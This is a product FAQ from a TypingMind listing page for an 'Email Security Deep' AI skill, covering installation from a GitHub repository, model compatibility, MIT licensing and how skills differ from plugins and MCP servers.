Because you install it once and use it with any model. Email Security Deep is plain Markdown rather than provider-specific code, so the same skill runs on GPT-5, Claude, Gemini, Grok, or a local model — and you can switch model mid-chat without it breaking. TypingMind runs on your own API keys, so you pay providers directly instead of a per-seat subscription, and your skills and chats stay in your own storage.

How do I install Email Security Deep in TypingMind?

Open Plugins → Skills → Install from GitHub in TypingMind and paste https://github.com/brucesongs/kali-claw/tree/main/skills/email-security-deep. TypingMind reads its SKILL.md and bundles its files and installs it as a skill you can enable per chat.

Which AI models can use Email Security Deep?

Any model you connect in TypingMind. AI skills are plain Markdown instructions rather than provider-specific code, so GPT, Claude, Gemini, Grok, and local models can all load this skill when a request matches it.

How many AI models can I use with Email Security Deep?

As many as you like. As long as a model supports skills, you can use Email Security Deep with it — GPT, Claude, Gemini, Grok, DeepSeek, Mistral, Llama and more — all on TypingMind with your own API keys.

Is the Email Security Deep AI skill free?

Yes. It is published on GitHub by brucesongs under the MIT license. You only pay your own AI provider for the tokens you use.

What are AI skills?

An AI skill is a reusable instruction bundle that teaches an AI model how to do one specific task. It follows the open Agent Skills format: a SKILL.md file with a name and description, plus any scripts, templates or reference files the model may need. The model reads the instructions only when your request matches the skill, so an installed skill costs nothing until it is used.

How are AI skills different from plugins or MCP servers?

A plugin or MCP server gives a model new tools to call — code that runs somewhere and returns a result. An AI skill gives the model knowledge and process instead: how to approach a task, which steps to follow, what good output looks like. Skills are plain Markdown, so they need no server, no API key and no runtime, and they work with any model.

View all

Set up your own AI workspace now

Get notified about new features and future giveaways by subscribing to our newsletter 👇